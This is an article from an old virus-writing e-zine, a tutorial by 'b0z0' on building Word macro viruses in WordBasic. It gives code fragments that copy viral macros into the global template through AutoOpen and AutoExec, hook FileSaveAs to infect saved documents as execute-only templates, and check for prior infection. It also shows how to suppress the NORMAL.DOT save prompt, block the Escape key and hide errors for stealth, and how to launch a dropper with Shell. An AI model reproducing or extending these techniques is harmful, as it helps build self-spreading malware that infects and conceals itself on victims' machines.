/-----------------------------\ | Xine - issue #1 - Phile 008 | \-----------------------------/ -------------------- . Wordmacro Viruses . ---. by b0z0 .--- ------------ 1. Introduction --------------- In this last period the Wordmacro viruses became well known by any PC user. After the first succesful macro virus attempt (the Concept macro) many new techniques has been implemented in this type of virus programming. Macro viruses are really simple to build, because they are programmed in a quite simple programming language internal to Word (6.0 or later) called Wordbasic. Using some lacks of security and some risky default options (that are also unconsidered by the tipical Word user :)) the infection and spread can easily become truth. In general the most used AV products (i mean TSR utilities) doesn't care of DOC files, because they are never really executed. This is the mainly advantage of Wordmacros. Some guys also consider that Wordmacro viruses can be considered as a multiplatform product, but this, due to some lacks of Micro$oft work, isn't totally true. 2. How they work? ----------------- All Word documents can contain near the text also a file called Template, which includes some specific definitions or macros (created with the included Word macro editing utilities) that can operate in a certain way on the text. This included macros can be also autoexecutable, this means that they can run at the moment while the document is loaded or can be executed on a determinate event. Word has some predefinited macros with reserved names, which starts on some specific operations like saving or opening a document. This predefinited stuff (with all others default page styles and so on) is located in the NORMAL.DOT template file. Creating a macro with one of the predefinited names will lead to execute something that we like at a specified event. The AutoExec macro for example is executed at the Word startup, the AutoOpen is executed at each document opening. So the general rule to do a takeover on the system is to replace some of the most used predifined macros with our virulent macros. 3.Creating a macro virus ------------------------ So the first thing to do in our Wordmacro is to put our virus macros instead of the original ones when the infected document is opened. We can easily put in the AutoOpen macro some lines, that will copy our infecting routines on the right place in the main Word macro storage (this is called the Global template), when the document will be opened. For example if we want to copy our macro AutoClose in the Global template our AutoOpen macro will look like this: Sub main MacroCopy WindowName$()+":AutoClose", "Global:AutoClose" ,1 End sub The Macrocopy commands in Wordbasic copies a macro (from a template) to another macro (in the same or in another template) With this we will replace the Autoclose macro in the Global template with our Autoclose from the current infected document (which name is given by the "WindowName$()" function). The final ",1" means that the macro is "Execute Only". This attribute won't let the user to read or modify the macro once that it was created. If we don't put the final "Execute Only" attribute any lamer will be able to change something in our virus or the user will notice that the macros aren't really of use to his work. A tipical Wordmacro virus will look for other more interesting predefinited macros. That would be cool, if we had the possibility to infect a document when it is being saved. To do this we can handle the FileSaveAs macro. We can put in it some code, that will put near the text that the user will save also our virulent macros. Like we told at the start of this section the add-on macros don't directly go to the DOC file, but to the template file (DOT). This isn't a very good thing, because like maybe you will notice, this will prevent us to infect other DOCs. This isn't true, because we can save anyway the user's work as a template and Word will at the next time load the saved file normally as it is a normal document. In this manner our macros will go around the world with the file with the extension .DOC, but definitely it will be only a template :) Let's see an example of a FileSaveAs macro: Sub Main Dim dbox As FileSaveAs 'we define which dialog box will appear GetcurValues dbox 'we inicialize and run the dialog box Dialog dbox Macrocopy "Global:AutoClose", WindowName$() + ":AutoClose" ,1 Macrocopy "Global:FileSaveAs", WindowName$() + ":FileSaveAs" ,1 dbox.Format = 1 'we are saving a template FileSaveAs dbox 'we finally save it End Sub In this example we copied two virulent macros (AutoClose and FileSaveAs) in the new file, which name was given by the user in the dialog box. We must of course first define the type of dialog box like a variable. If we was handling another macro (say FileOpen for example) we may use another dialog box depending on the macro (Dim dbox As FileOpen for example). After inicializing the dialog box with GetcurValues (general inicializing like directory where we stay, type and so on) we can finally display the dialog box simply running Dialog and putting the name (in our case dbox) of the just defined dialog box. Once copied our macros we defined that we were saving a template and finally called the old save routine. To implement our file infection macro we can also test, if the type of file we are saving is a DOC or a DOT. If the file is something other (for example the user is trying to save to a normal text file) it would be good not to copy the macros. To prevent this we can put a test after invoking the dialog box and test the dbox.Format. If the dbox.Format is equal to 0 then the user saved in a DOC file (and we can infect it of course transforming it in a template) and if the dbox.Format is equal to 1 the type is a template. In all the other cases the user selected something other, that we won't infect. So the test rutine after invoking the dialog box will be something like: If ((dbox.Format = 0) Or (dbox.Format=1)) then 'Infect them! End If FileSaveAs dbox Like for FileSaveAs we can for example try infecting on FileSave or on FileOpen (when a file is opened) or sometime else. This just depends from your taste. Now that we have put some of our routines in the Global template it would be good to write a macro, that will make our virus active when Word starts. This macro is named AutoExec and will appear very simillar to the AutoOpen macro. Infact in both cases we will only copy our macros instead of the original ones if they aren't already installed. Another important thing, while we are going resident or infecting a document, is to control if the template (the Global if we are just going resident or the file's template if we are infecting) is already infected by our virulent macros. Simply we can scan all the names of the installed macros and seek for one (of more) of our macros. This may look like this: For Cnt = 1 To CountMacros(0) 'we control all the macros in the Global If Macroname$(Cnt,0) = "OurNamedMacro" Then 'it is ours? Founded = 1 'we mark someway that we got it! EndIf Next Cnt Now we have put some good macros in the Global template. When a user will end his work and on a file and will exit from it, Word will automatically notice him that also the NORMAL.DOT (the Global template) has changed, asking you for a confirmation of saving. Of course this wouldn't be a very good stealth feature. To prevent this we can now write a macro, that will activate when we will exit from a file, that will deactivate the Yes/No prompting. The macro that we are looking for is the FileExit. To disable prompting we must just turn to zero a Word internal variable and then recall the old FileExit procedure. So the macro will be: Sub Main ToolsOptionsSave .GlobalDotPrompt = 0 FileExit End Sub The ToolsOptionSave is the well known Save folder in the Tools menu in the submenu Option, where are defined the preferences on saving. In this case we just directly switched off in that menu the option that enables prompting for saving changes in NORMAL.DOT. Additionally in all our macros it would be very good to include the "On Error Goto" capability, that automatically call the function that is given it as a parameter on an error occurance (after a function call or more simply if there is a compatibility problem like we will see later). This is *very* important when writing macros that includes dialog boxes or interrupable jobs. Infact when a user press the Cancel button in any dialog box an error will be generated, telling to the user that the macro wasn't succesfully completed. With a small error handler we can hide these errors and let our macros to continue. For example: Sub Main On Error Goto NoGood ; put here ya macro ; ...... ; end of the macro NoGood: ; do something else... for example only give again the control to the ; original function that the user was calling or just exit out of the ; macro Another very important Word option that must be set (to be as stealth as possible) is the Disableinput variable. Setting this to 1 will prevent the interruption of the macro with the ESC key. If you don't set this a user a little intelligent (duh... but if he was a little intelligent he wouldn't use Word ;) ) may press ESC during the execution of your macro (for example is you are writing to a file on the disk Word is halted for many seconds and he can notice the activity on the disk... but anyway under windoze the hard disk is always trashing ;))) ) for stopping it. What is worst is that if he stopped a macro with ESC he will receive a notice that the macro was succesfully stopped... not really a stealth feature ;) To continue with the stealth features (duh :) ) there is another Wordbasic command that may be useful to hide ourself. Infact if we set ScreenUpdate to 0 the document (or macro or everything :) ) will not be updated during the execution of the macro. This can be very useful if your macro also modifies something in the window with the text. To enable again screen updating just set the variable to 1. Maybe someone of you already noticed that the names of the functions that we call are basically the same as the full name in the Word menus. For example: FileSaveAs ; is the SaveAs command in menu File FileClose ; is the Close command in menu File ToolsOptions ; is the Options command in menu Tools ToolsOptionsSave ; is the Save folder in the Options command in ; the menu Tools So, all the commands of the menu File are precedded by a 'File' and so on. Just think what command do you want to hook, give a look to the help for the complete syntax and go write the macro :) 4.Handling files ---------------- Aditionally in Wordbasic you can also manipulate any external file on your hard disk. There are a few important command commonly used. The first is Open that opens a file on the disk. There are three types of file opening: Open "C:\PADA.NIA" For Input As #1 Open "C:\FOOBAR" For Output As #2 Open "C:\GULLI.VER" For Append As #3 With the first we open the file only for reading, in the second case for writing and in the last we open the file for appending data at the end of the existing file. Like you will see we must also assign a number to each file we open. Word can actually handle a maximum of 4 files (1-4). When we open a file for writing if the file doesn't exist Word will create one for us. When we want read from a file if it doesn't exist Word will give us an error (which can be easily handled with the already described error handler). This can be useful if we are checking is a file exist or not. Infact to see if a file is on the disk we can only open it for Input and if an error occours then the file doesn't exist (and maybe we are going to create it). After we succesfully opened a file (depending what we want to do) we can now write something to it with the Print or with the Write command (there is only a minor difference in the format between the two commands). Print #2, "Chauabunga" We can also read something from it using the Input$ function (or also the LineInput command if we are goin to read a line that is terminated with a CR-LF sequence): somechar$=Input$(20,#1) ;this will read 20 characters from the file #1 Line Input #1, $our ;will put in the var $our the current line from #1 When we have done all our operations on the file we finally can close it with a simple: Close #n ;closes file number 'n' There are also many other very useful commands that may be of use in our virulent macros (for example is very interesting the function Lof() which returns the lenght of a file in bytes, Kill() that deletes a file, SetAttr that changes the attributes of a file, GetAttr that takes the attributes of a file, Name to rename a file or a directory, File$ to search in the current directory some files with a pattern and so on) but of course i'm not going to talk about them all :) Just give a look to the help file for a more complete guide. 5.Executing Dos Commands ------------------------ After the file handling with Wordbasic we can also execute any external Dos program and also some of the internal Dos commands. To execute and external program the syntax is very simple: Shell "C:\DROPPER.COM", $type After Shell we put the command that we would execute and the type (this isn't mandatory) of the window of the program that is being executed. The type can be a number from 0 to 4 where: 0 means that the window is minimized to an icon 1 means normal window 2 means like 0. this is put for compatibility with Excel 3 means big window 4 means inactive window And this is all about the execution of external programs. Now let's give a look to the Dos internal commands that Wordbasic support. Of course, using this will not be spawn a window, so the user won't notice absolutely anything. For example: Mkdir "C:\GPL" Shell "mkdir C:\GPL",0 These final effect of this commands will be the same, but the second will spawn a new Dos shell for the execution of the command, and this maybe will alert the user. It will of course also use more PC resources. Here is a small list of very useful Dos internal commands supported by Wordbasic: Chdir "C:\FOO" ;changes current dir to C:\FOO Mkdir "C:\WINSLOTH" ;creates the directory C:\WINSLOTH Rmdir "C:\W1NL0SE" ;deletes the C:\W1NL0SE directory path$=Environ$("PATH") ;puts in path$ the current PATH Filecopy ..... ;to copy a file and so on... :) 6. Other Stuff -------------- Apart from this you can also do many other useful things with the Wordbasic language. There is a full set of arithmetic operators and functions for example. Commands to determine many things of a machine (like language, cpu, mem) are also avaiable. The handling of the WIN.INI config file is also a good optional :) as in other high level languages the manipulation of strings is fully implemented. 7. Multiplatform features ------------------------- One of the worst things of the Wordmacro viruses is the portability. Infact a Wordmacro virus written using the english set of commands won't work with the swedish version. Word will notice to the user that there are some macros that are using unknown commands. Infact all of the names of the menus are different. The FileClose of the english Word is for example FileChiudi in the italian and DataiBeended in the german version. That's simply because the names that are present into the menus are different from version to version. 8. A real threath? ------------------ There is really simple to protect yourself from being infected. You can just disable the automatic execution of the macros. So Wordmacros can't be absolutely considered a real threath. Anyway the Wordbasic language is fun and has _a lot_ of interesting commands that can be used. Definitely Wordmacros are nice for us to have a little of fun, as usual in our work :)